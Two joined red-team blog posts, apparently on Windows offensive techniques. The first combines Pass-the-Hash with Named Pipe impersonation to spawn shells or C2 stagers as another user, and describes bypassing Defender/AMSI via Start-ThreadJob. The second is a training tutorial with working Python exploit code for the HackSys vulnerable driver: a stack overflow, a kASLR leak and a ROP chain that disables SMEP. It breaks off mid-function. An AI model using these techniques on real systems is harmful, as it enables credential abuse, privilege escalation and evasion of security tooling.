Named Pipe Pass-the-Hash

Original text by s3cur3th1ssh1t

This post covers a little project I did last week, which combines Named Pipe Impersonation with Pass-the-Hash (PTH) to execute binaries as another user. Neither technique is new, and both are widely used; the only thing I did here was combine and modify existing tools. The current public tools all use PTH for network authentication only. The difference with this “new” technique is therefore that you can also spawn a new shell or C2-Stager as the PTH user for local actions and network authentication.


2.05.2021: Update

Unfortunately, I learned that my technique can only be used for local actions, not for network authentication, because impersonation tokens are restricted to local actions.


Introduction — why another PTH tool?

I have faced certain offensive security project situations in the past where I already had the NTLM hash of a low-privileged user account and needed a shell for that user on the currently compromised system, but the current public tools could not provide one. Imagine two more facts for a situation like that: the NTLM hash could not be cracked, and there was no process of the victim user to execute shellcode in or to migrate into. This may sound like an absurd edge case to some of you, but I have still experienced it multiple times. In more than one engagement I spent a lot of time searching for the right tool or technique for that specific situation. Last week, @n00py1 tweeted exactly the question I had in mind in those projects:

So I thought: other people in the field obviously face the same limitations with existing tools.

My personal goals for a tool/technique were:

  • Fully featured shell or C2-connection as the victim user-account
  • It must be able to impersonate low-privileged accounts as well. Depending on engagement goals, it might be necessary to access a system as a specific user such as the CEO, HR accounts, SAP administrators or others
  • The tool has to be usable from the compromised system alone, without, for example, another Linux box under our control in the network, so that it can be used as a C2 module

The tweet above therefore inspired me to search for existing tools and techniques again. There are plenty of tools for network authentication via Pass-the-Hash. Most of them have the primary goal of code execution on remote systems, which requires a privileged user's hash. Some of those are:

If we want access to an administrative account and a shell for that account, we can easily use the WMI, DCOM and WinRM PTH tools, as commands are executed in the user’s context. The Python tools could be executed over a SOCKS tunnel via C2, for example, and the PowerShell scripts work out of the box locally. SMB PTH tools execute commands as NT AUTHORITY\SYSTEM, so user impersonation is not possible there. One of my personal goals, the impersonation of low-privileged accounts, was therefore not fulfilled, so I had to search for more possibilities.

In my opinion, the best results for local PTH actions indeed come from Mimikatz’s sekurlsa::pth and Rubeus’s PTT features. I tested them again to start software via PTH or inject a Kerberos ticket into existing processes, and realized that they only provide network authentication for the PTH user. Network authentication only? OK, I have to admit that in most cases network authentication is enough. You can read and write Active Directory via LDAP, access network shares via SMB, execute code on remote systems with a privileged user (SMB, WMI, DCOM, WinRM) and so on. But still, the edge case of starting an application as the other user via Pass-the-Hash is not covered. I thought that it might be possible to modify one of those tools to achieve the specific goal of an interactive shell. To do that, I first had to dig into the code to understand it. Modifying Rubeus was no option for me, because PTT uses a Kerberos ticket, which, as far as I know, is only used for network authentication. That won’t help us authenticate on the localhost for a shell. So in the next step I took a look at the Mimikatz feature.

Mimikatz’s sekurlsa::pth feature

This part only gives some background information on the sekurlsa::pth Mimikatz module. If you already know about it, feel free to skip it. Searching for sekurlsa::pth internals turned up two good blog posts, which I recommend for a deeper look into the topic, as I will only explain the high-level process:

A really short high-level overview of the process is as follows:

  • MSV1_0 and Kerberos are two Windows authentication providers, which handle authentication using the provided credential material
  • The LSASS process on a Windows operating system contains a structure with MSV1_0 and Kerberos credential material
  • Mimikatz sekurlsa::pth creates a new process with a dummy password for the PTH user. The process is first created in the SUSPENDED state
  • Afterwards, it creates a new MSV and Kerberos structure with the user-provided NTLM hash and overwrites the original structure for the given user
  • The newly created process is RESUMED, so that the specified binary, for example cmd.exe, is executed

The following is copied from the Part II blog post: Overwriting these structures does not change the security information or user information for the local user account. The credentials stored in LSASS are associated with the logon session used for network authentication and not for identifying the local user account associated with a process.


Those of you who have read my other blog posts know that C/C++ is not my favorite language. Therefore, I decided to work with @b4rtik’s SharpKatz code, a C# port of what are, in my opinion, the most important and most used Mimikatz functions. Normally, I don’t like blog posts explaining a topic with code. Don’t ask me why, but this time I did it myself. The PTH module first creates a structure for the credential material called data from the class SEKURLSA_PTH_DATA:

The NtlmHash of this new structure is filled with our given Hash:


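    // The hash can be passed via the rc4 or the ntlmHash parameter;
    // ntlmHash wins if both are set, because it is assigned last
    if (!string.IsNullOrEmpty(rc4))
        ntlmHashbytes = Utility.StringToByteArray(rc4);

    if (!string.IsNullOrEmpty(ntlmHash))
        ntlmHashbytes = Utility.StringToByteArray(ntlmHash);

    // Reject anything that is not exactly LM_NTLM_HASH_LENGTH bytes long
    if (ntlmHashbytes.Length != Msv1.LM_NTLM_HASH_LENGTH)
        throw new System.ArgumentException();

    // Store the hash in the credential material structure
    data.NtlmHash = ntlmHashbytes;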
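For readers who want to experiment in Python, the hash handling above comes down to a hex decode followed by a length check. The sketch below mirrors that logic. The function name `parse_ntlm_hash` is hypothetical. The 16-byte length assumes that `Msv1.LM_NTLM_HASH_LENGTH` matches the size of an NT hash, which is a 16-byte MD4 digest.

```python
NTLM_HASH_LENGTH = 16  # an NT hash is a 16-byte MD4 digest


def parse_ntlm_hash(rc4: str = "", ntlm_hash: str = "") -> bytes:
    """Hypothetical Python equivalent of the SharpKatz hash handling.

    As in the C# snippet, a value passed as ntlm_hash takes precedence
    over one passed as rc4, because it is assigned last.
    """
    hash_bytes = b""
    if rc4:
        hash_bytes = bytes.fromhex(rc4)
    if ntlm_hash:
        hash_bytes = bytes.fromhex(ntlm_hash)
    if len(hash_bytes) != NTLM_HASH_LENGTH:
        raise ValueError(
            f"expected {NTLM_HASH_LENGTH} bytes, got {len(hash_bytes)}"
        )
    return hash_bytes


# Example with the hash used in the SharpKatz command later in this post
print(parse_ntlm_hash(ntlm_hash="7C53CFA5EA7D0F9B3B968AA0FB51A3F5").hex())
```

Unlike the C# code, this sketch raises a `ValueError` when neither parameter is set. The C# code would instead fail on a null reference.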

A new process is created in the SUSPENDED state. Note that our PTH username is passed with an empty password:


                    PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
                    if(CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi))

In the next step, the process is opened and the LogonID of the new process is copied into our credential material object, which is related to our PTH username.

Afterwards, the function Pth_luid is called. This function first searches for the MSV1.0 and Kerberos credential material and then overwrites it with our newly created structure:

If that succeeds, the process is resumed via NtResumeProcess.

Named Pipe Impersonation

While thinking about alternative ways to impersonate the PTH user, I asked @EthicalChaos about my approach, my ideas and the use case. Brainstorming with you is always a pleasure, thanks for that! Some ideas for the use case were:

  • NTLM challenge response locally via InitializeSecurityContext / AcceptSecurityContext
  • Impersonation via process token
  • Impersonation via named pipe identity
  • Impersonation via RPC Identity

I excluded the first one because I simply had no idea about it and had never worked with it before. Impersonation via process token or RPC identity requires an existing process of the target user to steal the token from. No process for the target user exists in my scenario, so only Named Pipe Impersonation was left. And I thought: cool, I have already worked with that to build a script to get a SYSTEM shell, NamedPipeSystem.ps1. So I’m not completely lost in the topic and know what it is about.

For everyone out there who doesn’t know about Named Pipe Impersonation, I can recommend the following blog post by @decoder_it:

Again, I will give a short high-level overview. Named Pipes are meant for asynchronous or synchronous communication between processes. It’s possible to send or receive data via Named Pipes locally or over the network. On a Windows operating system, Named Pipes are accessible over the IPC$ network share. One Windows API call, namely ImpersonateNamedPipeClient(), allows the server to impersonate any client connecting to it. The only thing you need for that is the SeImpersonatePrivilege privilege. Local administrators and many service accounts have this privilege by default. So opening up a Named Pipe with this privilege enables us to impersonate any user connecting to that pipe via ImpersonateNamedPipeClient() and to open a new process with the token of that user account.

My first thought about combining Named Pipe Impersonation with PTH was that I could spawn a new cmd.exe process via Mimikatz or SharpKatz Pass-the-Hash and connect to the Named Pipe over IPC$ from the new process. If the network credentials were used for that, we would be able to fulfill all our goals for a new tool. So I opened up a new PowerShell process via PTH and SharpKatz with the following command:


.\SharpKatz.exe --Command pth --User testing --Domain iPad --NtlmHash 7C53CFA5EA7D0F9B3B968AA0FB51A3F5 --Binary "\WindowsPowerShell\v1.0\powershell.exe"

What happens in the background is explained above. To test that we are really using the credentials of the user testing, we can connect to an SMB server on a Linux box:


smbserver.py -ip 192.168.126.131 -smb2support testshare /mnt/share

After starting the server, we can connect to it by simply echoing into the share:

And voilà, the authentication as testing came in, so this definitely works:

@decoder_it wrote a PowerShell script, pipeserverimpersonate.ps1, which lets us easily open up a Named Pipe server for user impersonation and then open cmd.exe with the token of the connecting user. My next step was to test whether connections from this new process reach the Named Pipe server with the network credentials. Unfortunately, this turned out not to be the case:

I tried to access the pipe via 127.0.0.1, the hostname and the external IP, but got the same result in every case:

I also tried using a NamedPipeClient via PowerShell, hoping this would result in network authentication as the user testing. Still no success:

At this point I had no clue how I could trigger network authentication to localhost for the Named Pipe access. So I gave up on Mimikatz and SharpKatz, though I still learned something along the way, and maybe some of you did too. This was a dead end for me.

But what exactly happens when network authentication is triggered? To check that, I monitored the network interface for SMB access from one Windows system to another:

  1. The TCP/IP three-way handshake is done (SYN, SYN/ACK, ACK)
  2. Two Negotiate Protocol Requests and Responses
  3. Session Setup Request, NTLMSSP_NEGOTIATE + NTLMSSP_AUTH
  4. Tree Connect Request to IPC$
  5. Create Request File testpipe
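The captured sequence maps fairly directly onto the high-level methods of impacket’s `SMBConnection` class. The sketch below is not the author’s tool. It illustrates a client, assuming impacket is installed, that authenticates with only an NT hash, connects to `IPC$`, opens a pipe, and then performs the close, tree disconnect and logoff that the modified Invoke-SMBExec also ends with. The function name `touch_named_pipe` is hypothetical. Whether impacket expects the pipe name with or without a leading backslash is an assumption to verify against your impacket version. impacket’s `login()` also performs the NTLMSSP challenge round trip internally.

```python
def touch_named_pipe(conn, user: str, domain: str, nthash: str,
                     pipe: str = "testpipe") -> None:
    """Authenticate with an NT hash, then open and close a pipe on IPC$.

    `conn` is expected to behave like impacket.smbconnection.SMBConnection.
    """
    # Session Setup: NTLM authentication with an empty password and the NT hash
    conn.login(user, "", domain, lmhash="", nthash=nthash)
    try:
        # Tree Connect Request to IPC$
        tid = conn.connectTree("IPC$")
        try:
            # Create Request for the pipe (leading backslash is an assumption)
            fid = conn.openFile(tid, "\\" + pipe)
            # Close Request
            conn.closeFile(tid, fid)
        finally:
            # Tree Disconnect
            conn.disconnectTree(tid)
    finally:
        # Logoff
        conn.logoff()


# Usage sketch (requires impacket and a reachable SMB server):
#   from impacket.smbconnection import SMBConnection
#   conn = SMBConnection("127.0.0.1", "127.0.0.1")
#   touch_named_pipe(conn, "testing", "iPad", "7C53CFA5EA7D0F9B3B968AA0FB51A3F5")
```

The connection object is passed in rather than created inside the function, so the packet order can be checked without a live server.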

During my tool research, I took a look at @kevin_robertson’s Invoke-SMBExec.ps1 code and found that this script builds exactly these packets and sends them manually. So by modifying this script, it could be possible to skip the Windows default behaviour and send exactly those packets ourselves. This would simulate a remote system authenticating to our pipe as the user testing.

I went through the SMB documentation for some hours, but to be honest, it did not help me much. Then I had the idea to simply monitor the default Invoke-SMBExec.ps1 traffic for the testing user. Here is the result:

Comparing those two packet captures reveals only one very small difference: Invoke-SMBExec.ps1 tries to access the Named Pipe svcctl. We can easily change that in lines 1562 and 2248 for the CreateRequest and CreateAndXRequest stages by using different hex values for another pipe name. So if we just change those bytes to the following, a CreateRequest is sent to our attacker-controlled Named Pipe:


$SMB_named_pipe_bytes = 0x74,0x00,0x65,0x00,0x73,0x00,0x74,0x00,0x70,0x00,0x69,0x00,0x70,0x00,0x65,0x00 # "testpipe" as UTF-16LE
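The byte list above is simply the pipe name encoded as UTF-16LE, so each ASCII character is followed by a zero byte. To use a different pipe name, a small helper like the following can print a replacement value in the same PowerShell array syntax. The helper is hypothetical and not part of Invoke-SMBExec. It also assumes that the script derives any length fields from the array itself, which is worth checking before using a name of a different length.

```python
def pipe_name_to_ps_bytes(pipe_name: str) -> str:
    """Render a pipe name as a comma-separated PowerShell byte list.

    SMB Create requests carry file names as UTF-16LE, so every ASCII
    character becomes its code point followed by 0x00.
    """
    encoded = pipe_name.encode("utf-16-le")
    return ",".join(f"0x{byte:02x}" for byte in encoded)


if __name__ == "__main__":
    print("$SMB_named_pipe_bytes = " + pipe_name_to_ps_bytes("testpipe"))
```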

The result is a local authentication to the Named Pipe as the user testing:

To get rid of the error message and the resulting timeout, we have to make some further changes to the Invoke-SMBExec code. I therefore modified the script so that, after the CreateRequest, CloseRequest, TreeDisconnect and Logoff packets are sent instead of the default code execution steps for service creation and so on. I also removed all the Inveigh session handling, its parameters and so on.

But there was still one more thing to fix. I got the following error from cmd.exe when impersonating the user testing via network authentication:

This error didn’t pop up when cmd.exe was opened with the password and the pipe was accessed afterwards.

Googling this error yields many, many crap answers, ranging from “corrupted filesystem, try to repair it” to “install DirectX 11” or “Disable Antivirus”. I decided to ask the community via Twitter and got a fast response from @tiraniddo: the error code is most likely caused by not being able to open the window station. A solution for that is changing the WinSta/Desktop DACL to grant everyone access. I would never have figured this out, so thank you for that! 🙂 @decoder_it also sent a link to RoguePotato, which includes code for setting the correct WinSta/Desktop permissions.

Modifying RoguePotato & building one script as PoC

After looking at the Desktop.cpp code from RoguePotato, I decided pretty fast that porting it to PowerShell or C# was not a good idea for me, as it would take way too much time. So my idea was to modify the RoguePotato code to get a pipe server that sets the correct permissions for WinSta/Desktop. Doing this was straightforward, as I mostly had to remove code: the RogueOxidResolver components, the IStorageTrigger and so on. The result is the PipeServerImpersonate code.

Testing the server in combination with our modified Invoke-SMBExec script did not produce a shell at first. The CreateProcessAsUserW function did not open the desired binary, even though the token had the SE_ASSIGNPRIMARYTOKEN_NAME privilege. I ended up using CreateProcessWithTokenW with CREATE_NEW_CONSOLE as dwCreationFlags, which worked perfectly fine. Opening the Named Pipe via the modified RoguePotato and connecting to it via Invoke-NamedPipePTH.ps1 resulted in a successful Pass-the-Hash to a Named Pipe, followed by impersonation and binary execution with the new token:

Still, this is not a perfect solution. Dropping PipeServerImpersonate to disk and executing the script in another session is one option, but in my opinion a single script doing everything is much better. Therefore, I built a single script that leverages Invoke-ReflectivePEInjection.ps1 to execute PipeServerImpersonate from memory. This is done in the background via Start-Job, so that Invoke-NamedPipePTH can connect to the pipe afterwards. It’s possible to specify a custom pipe name and binary for execution:

This enables us to use it as a module from a C2 server. You could also specify a C2-Stager as the binary, so that you get a new agent with the credentials of the PTH user.

Further ideas & improvements

I still see my code as a PoC, because it is far from OPSEC safe and I didn’t test many possible use cases. Using syscalls instead of Windows API functions for PipeServerImpersonate and the PE injection would further improve it, for example.

For those of you looking for a C# solution: Sharp-SMBExec is a C# port of Invoke-SMBExec, which can be modified the same way I did here to get a C# version of the PTH-to-Named-Pipe part. However, the PipeServerImpersonate part would also have to be ported, which in my opinion is more work.


2.05.2021: Update

I also wrote a C# version based on this idea. It can be found here:

https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH

The whole project gave me the idea that it would be really cool to also add an option to impacket’s ntlmrelayx.py to relay connections to a Named Pipe. Imagine you compromised a single host in a customer environment, and this single host didn’t give you any valuable credentials but has SMB Signing disabled. Modifying PipeServerImpersonate so that the Named Pipe is not closed but re-opened after executing a binary would make it possible to get a C2-Stager for every single incoming NetNTLMv2 connection. This means raining shells. The connections only need to be relayed to \\targetserver\IPC$\pipename to get a shell or C2 connection.


2.05.2021: Update

This idea was nice under the assumption that the new process has both local and network authentication. But with an impersonation token, we can only do things locally, as also explained in the next part. Therefore, the raining shells would not help us move anywhere.


With @itm4n’s article about PrintSpoofer (https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) in mind, I also wondered whether it’s possible to relay a Domain Controller’s computer account hash to our Named Pipe via SpoolSample. This can be done with the MS-RPRN part of https://github.com/leechristensen/SpoolSample/tree/master/MS-RPRN by using / instead of \ for the target system, like this:


MS-RPRN.exe \\DomainControllerFQDN \\OurCompromisedSystemFQDN/pipe/pipename

This works perfectly fine, and we can therefore get a shell as the Domain Controller computer account:

With TokenViewer, we can see which token type and impersonation level we have:

After writing this post and fiddling around with the shells of the newly impersonated users, I learned that impersonation tokens are restricted to local operating system actions only. Processes with this token type cannot access network resources such as LDAP, SMB, HTTP or anything else. Therefore, our DC shell, for example, is useless.

That is, until someone finds a way to get a delegation token from a process with an impersonation token, for example. If the impersonated user is logged on interactively, you can also create a scheduled task for that user and trigger it. This would, for example, give the newly created task network access.

Conclusion

This is the first time I have created something like a new technique. At least I haven’t seen anyone else combine PTH and Named Pipe Impersonation with the same goal. For me, this was a pretty exciting experience, and I learned a lot again.

I hope that you also learned something from this, or can at least use the resulting tool in engagements whenever you are stuck in a situation like the one described above. The script/tool is released with this post, and feedback is, as always, very welcome!


20.04.2021: Update

I’m pretty sure that, before publishing the tool, I tested whether the content of Start-Job script blocks was scanned or blocked by AMSI. It was neither scanned nor blocked. After the publication, Microsoft obviously decided to activate this feature, because the standalone script no longer worked with Defender enabled, even after patching AMSI.dll in memory for the process:

Therefore, I decided to switch from the native Start-Job function to the Start-ThreadJob function, which again bypasses Defender because it’s executed in the same process:

If this description is accurate, Start-Job should have scanned and blocked scripts before as well, because it runs in another process. Start-ThreadJob, however, stays in the same process, so the in-memory AMSI bypass works:


HEVD: kASLR + SMEP Bypass

Original text by Andres Roldan

In the last posts, we have been dealing with exploitation in Windows kernel space. Our target is the HackSys Extremely Vulnerable Driver, or HEVD, which contains several vulnerabilities that let practitioners sharpen their Windows kernel exploitation skills.

In the last post, we successfully created a DoS exploit leveraging a stack overflow vulnerability in HEVD. The DoS occurred because we placed an arbitrary value (41414141) in EIP, and when the OS tried to access that memory address, it was not accessible.

In this article, we will use that ability to overwrite EIP to execute code in privileged mode.

During the exploitation process, we will come across Supervisor Mode Execution Prevention, or SMEP, which will thwart our exploit. But fear not: we will be able to bypass it.

Local vs Remote exploitation

When we were exploiting Vulnserver, we were doing remote exploitation of a user-space application. That kind of environment has certain specific restrictions. The most notorious are limited buffer space for our payload, character restrictions and ASLR (Address Space Layout Randomization).

When exploiting the Windows kernel, we assume that we already have unprivileged local access to the target machine. In that environment, those restrictions are no longer a major issue. For example, we can easily circumvent the buffer space and character restrictions by allocating dynamic memory with VirtualAlloc(), moving the raw payload to that buffer and overwriting EIP with the returned pointer.

ASLR and kASLR (kernel ASLR) are not an issue either. They work by randomizing the base addresses of modules at every restart, but with local access, there are functions in the Windows API that reveal the current kernel base address.

However, other protections come into play when exploiting at kernel level, like DEP, SMEP, CFG, etc. We will surely come across some of them later. Stay tuned.

Stack Overflow exploitation

We left off our previous article after performing a DoS on the target machine with the following exploit:


#!/usr/bin/env python3
"""
HackSysExtremeVulnerableDriver Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDriver
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

from infi.wioctl import DeviceIoControl

DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'

IOCTL_HEVD_STACK_OVERFLOW = 0x222003
SIZE = 3000

PAYLOAD = (
    b'A' * SIZE
)

# Open the driver's device and send the oversized buffer to the
# stack overflow IOCTL handler
HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

And we were able to overwrite EIP with the value 41414141. To do something more interesting, we must start by locating the exact offset at which EIP is overwritten. Just like in any other user-space exploitation process, we can create a cyclic pattern to find that offset. We can use mona to do that:

Mona Cyclic Pattern

Then, update our exploit:


#!/usr/bin/env python3
"""
HackSysExtremeVulnerableDriver Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDriver
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

from infi.wioctl import DeviceIoControl

DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'

IOCTL_HEVD_STACK_OVERFLOW = 0x222003

PAYLOAD = (
    b'<insert pattern here>'
)

SIZE = len(PAYLOAD)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

And check it:

Mona Cyclic Pattern

Good, mona discovered that EIP gets overwritten at offset 2080, that is, right after the first 2080 bytes of our buffer.
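If mona is not at hand, the cyclic pattern and the offset lookup are easy to reproduce. The sketch below generates a Metasploit-style pattern made of uppercase, lowercase and digit triplets (Aa0Aa1Aa2...). As far as we know, this is the format mona’s pattern_create emits, but treat that compatibility as an assumption. Because EIP is read as a little-endian DWORD, the lookup packs the crashing EIP value back into bytes before searching.

```python
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Build a Metasploit-style cyclic pattern of `length` bytes."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    raise ValueError("patterns longer than 20280 bytes are not unique")


def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """Return the offset of a crashing EIP value in the pattern, or -1."""
    # EIP is loaded as a little-endian DWORD, so pack it back into bytes
    needle = struct.pack("<L", eip_value)
    return pattern.find(needle)


# Usage: send cyclic_pattern(3000) to the driver, read EIP in WinDBG after
# the crash, then call pattern_offset(pattern, <EIP value>)
```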

Now, for illustration purposes, we’ll create a simple shellcode that sets EAX = 0xdeadbeef. Then, we must copy it into a dynamically allocated buffer created by VirtualAlloc(). The return value of VirtualAlloc() is a pointer that we place right after the first 2080 bytes of our buffer (offset 2080) to divert the execution flow to our shellcode.
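The buffer layout described above can be checked independently of the driver. The hypothetical helper below is not part of the original exploit. It places a 32-bit pointer right after 2080 bytes of padding, packed little-endian just as `struct.pack('<L', ...)` does in the exploit. The pointer value in the usage line is made up, because the real one comes from `VirtualAlloc()` at run time.

```python
import struct

EIP_OFFSET = 2080  # offset found with mona above


def build_payload(shellcode_ptr: int, offset: int = EIP_OFFSET) -> bytes:
    """Padding up to the saved return address, then the shellcode pointer."""
    if not 0 <= shellcode_ptr <= 0xFFFFFFFF:
        raise ValueError("a 32-bit pointer is expected on x86")
    return b"A" * offset + struct.pack("<L", shellcode_ptr)


# Hypothetical pointer value, only to show the resulting layout
payload = build_payload(0x00510000)
print(len(payload), payload[EIP_OFFSET:].hex())
```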

Let’s update our exploit with that:


#!/usr/bin/env python3
"""
HackSysExtremeVulnerableDriver Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDriver
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

import struct
from ctypes import windll, c_int
from infi.wioctl import DeviceIoControl

KERNEL32 = windll.kernel32
DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'
IOCTL_HEVD_STACK_OVERFLOW = 0x222003

SHELLCODE = (
    b'\xb8\xef\xbe\xad\xde' +     # mov eax,0xdeadbeef
    b'\xcc'                       # INT3 -> software breakpoint
)

# Allocate RWX user-mode memory to hold the shellcode
RET_PTR = KERNEL32.VirtualAlloc(
    c_int(0),                    # lpAddress
    c_int(len(SHELLCODE)),       # dwSize
    c_int(0x3000),               # flAllocationType = MEM_COMMIT | MEM_RESERVE
    c_int(0x40)                  # flProtect = PAGE_EXECUTE_READWRITE
)

# Copy the shellcode into the allocated buffer
KERNEL32.RtlMoveMemory(
    c_int(RET_PTR),              # Destination
    SHELLCODE,                   # Source
    c_int(len(SHELLCODE))        # Length
)

# 2080 bytes of padding, then the shellcode address overwrites the saved EIP
PAYLOAD = (
    b'A' * 2080 +
    struct.pack('<L', RET_PTR)
)

SIZE = len(PAYLOAD)

HANDLE = DeviceIoControl(DEVICE_NAME)
HANDLE.ioctl(IOCTL_HEVD_STACK_OVERFLOW, PAYLOAD, SIZE, 0, 0)

If everything goes as expected, EAX will hold the value 0xdeadbeef and execution will pause at the inserted breakpoint (\xcc). Let’s check it:

SMEP in action

Ouch!

Our exploit was thwarted: the error ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY was triggered when the first instruction of our shellcode was about to execute. That means that SMEP protected the kernel.

SMEP: Supervisor Mode Execution Prevention

There’s a concept called protection rings, which operating systems use to delimit capabilities and provide fault tolerance by defining privilege levels. Windows uses only two Current Privilege Levels (CPL): 0 and 3. CPL levels are also referred to as rings: CPL0, or ring-0, is where the kernel executes, and CPL3, or ring-3, is where user-mode instructions run.

SMEP is a CPU-level protection that prevents the kernel from executing code belonging to ring-3.

The ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY exception was triggered because HEVD executes at ring-0. After we overwrote EIP, it tried to run the instructions of our shellcode, which was allocated at ring-3.

Technically, SMEP is nothing but a bit in a CPU control register, specifically bit 20 (counting from 0) of the CR4 control register:

CR4 register

To bypass SMEP, we must flip that bit (make it 0). As can be seen, the current value of CR4 with SMEP enabled is 001406e9. Let’s check what the value would be after flipping bit 20:

CR4 register

It would be 000406e9. We need to place that value in CR4 to turn off SMEP.
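The bit arithmetic is easy to double-check. SMEP is bit 20 of CR4, so clearing it amounts to a bitwise AND with the inverted mask `1 << 20`:

```python
SMEP_BIT = 20  # CR4.SMEP, counting bits from 0


def smep_enabled(cr4: int) -> bool:
    """True if the SMEP bit is set in the given CR4 value."""
    return bool(cr4 & (1 << SMEP_BIT))


def clear_smep(cr4: int) -> int:
    """Return the CR4 value with only the SMEP bit cleared."""
    return cr4 & ~(1 << SMEP_BIT)


cr4 = 0x001406E9  # value observed in WinDBG above
print(hex(cr4), smep_enabled(cr4), "->", hex(clear_smep(cr4)))
# prints: 0x1406e9 True -> 0x406e9
```

The exploit hard-codes the resulting value. The other CR4 bits depend on the CPU and OS configuration, so a value taken from one machine may not be correct on another.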

But how can we do that if we are not allowed to execute instructions at ring-3? ROP comes to the rescue! We need to execute a ROP chain made of instructions that already live in kernel mode. At ring-0, ROP is often referred to as kROP. So we need to execute a kROP chain that changes the value of CR4. With that, we should be able to make EAX = 0xdeadbeef.

In nt!KeFlushCurrentTb, we find a gadget that sets CR4 from whatever value EAX holds: mov cr4, eax # ret

CR4 ROP

Now, we need to calculate the offset of that ROP gadget from the start of the nt module:

CR4 ROP Offset

The offset is 0011f8de. We’ll use that later.

Now we need to find a pop eax # ret gadget. We can find one at nt!_MapCMDevicePropertyToNtProperty+0x39:

POP EAX ROP

Its offset from the start of the nt module is 0002bbef:

POP EAX Offset

We must remember to pad our ROP chain with 8 bytes. The epilog of the overflowed function uses ret 8, which returns to the address pointed to by ESP and then releases 8 more bytes from the stack:

ROP Padding

With that, we can now disable SMEP!
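To see why the two padding DWORDs sit right after the first gadget, it helps to walk through the chain step by step. The sketch below is a toy model, not a CPU emulator. It only understands the two gadgets used here, it models the vulnerable function’s `ret 8`, and it uses a made-up kernel base and shellcode pointer (`0x81E0C000` and `0x00510000` are hypothetical values). The gadget offsets are the ones found above, and the chain order matches the exploit in this post.

```python
import struct

POP_EAX_RET = 0x0002BBEF      # pop eax # ret        (offset from nt base)
MOV_CR4_EAX_RET = 0x0011F8DE  # mov cr4, eax # ret   (offset from nt base)


def build_chain(base: int, shellcode_ptr: int) -> bytes:
    """ROP chain laid out in the same order as the exploit."""
    return struct.pack(
        "<6L",
        base + POP_EAX_RET,
        0x42424242, 0x42424242,   # skipped by the epilog's `ret 8`
        0x000406E9,               # popped into EAX
        base + MOV_CR4_EAX_RET,
        shellcode_ptr,
    )


def simulate(chain: bytes, base: int):
    """Toy walk-through of the chain; returns (EIP, EAX, CR4, trace)."""
    stack = list(struct.unpack(f"<{len(chain) // 4}L", chain))
    eax, cr4, trace = None, None, []

    # Vulnerable function epilog `ret 8`: pop EIP, then skip 8 more bytes
    eip = stack[0]
    esp = 1 + 2
    while True:
        if eip == base + POP_EAX_RET:
            eax = stack[esp]
            eip = stack[esp + 1]
            esp += 2
            trace.append("pop eax # ret")
        elif eip == base + MOV_CR4_EAX_RET:
            cr4 = eax
            eip = stack[esp]
            esp += 1
            trace.append("mov cr4, eax # ret")
        else:
            # Execution has left the chain; this should be the shellcode
            return eip, eax, cr4, trace


BASE = 0x81E0C000           # hypothetical kernel base
SHELLCODE_PTR = 0x00510000  # hypothetical VirtualAlloc() result
print(simulate(build_chain(BASE, SHELLCODE_PTR), BASE))
```

Moving the padding anywhere else in the chain would make `pop eax` load 0x42424242 into CR4, which is exactly the mistake this model makes visible.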

Defeating kASLR

We’ve got all the information required to create the ROP chain that disables SMEP. However, we still need to deal with kernel ASLR. As I mentioned before, several functions that can be executed in user mode (ring-3) leak addresses from ring-0. The most commonly used are NtQuerySystemInformation() and EnumDeviceDrivers(). The latter is simpler. With the following code, you can get the kernel base address:


import sys
from ctypes import windll, c_ulong, byref, sizeof

PSAPI = windll.psapi

def get_kernel_base():
    """Obtain kernel base address."""
    buff_size = 0x4

    base = (c_ulong * buff_size)(0)

    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):
        print('Failed to get kernel base address.')
        sys.exit(1)
    return base[0]

BASE_ADDRESS = get_kernel_base()
print(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')

And check it:

Kernel Base Address

As you can see, it matches the address reported by WinDBG perfectly:

Kernel Base Address

With that, we can update our exploit: we add the ROP chain that disables SMEP and combine the gadget offsets with the value returned by that function to obtain absolute addresses, defeating kASLR!


#!/usr/bin/env python3
"""
HackSysExtremeVulnerableDriver Stack Overflow.

Vulnerable Software: HackSysExtremeVulnerableDriver
Version: 3.00
Exploit Author: Andres Roldan
Tested On: Windows 10 1703
Writeup: https://fluidattacks.com/blog/hevd-smep-bypass/
"""

import struct
import sys
from ctypes import windll, c_int, c_ulong, byref, sizeof
from infi.wioctl import DeviceIoControl

KERNEL32 = windll.kernel32
PSAPI = windll.psapi
DEVICE_NAME = r'\\.\HackSysExtremeVulnerableDriver'
IOCTL_HEVD_STACK_OVERFLOW = 0x222003


def get_kernel_base():
    """Obtain kernel base address."""
    buff_size = 0x4

    base = (c_ulong * buff_size)(0)

    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):
        print('Failed to get kernel base address.')
        sys.exit(1)
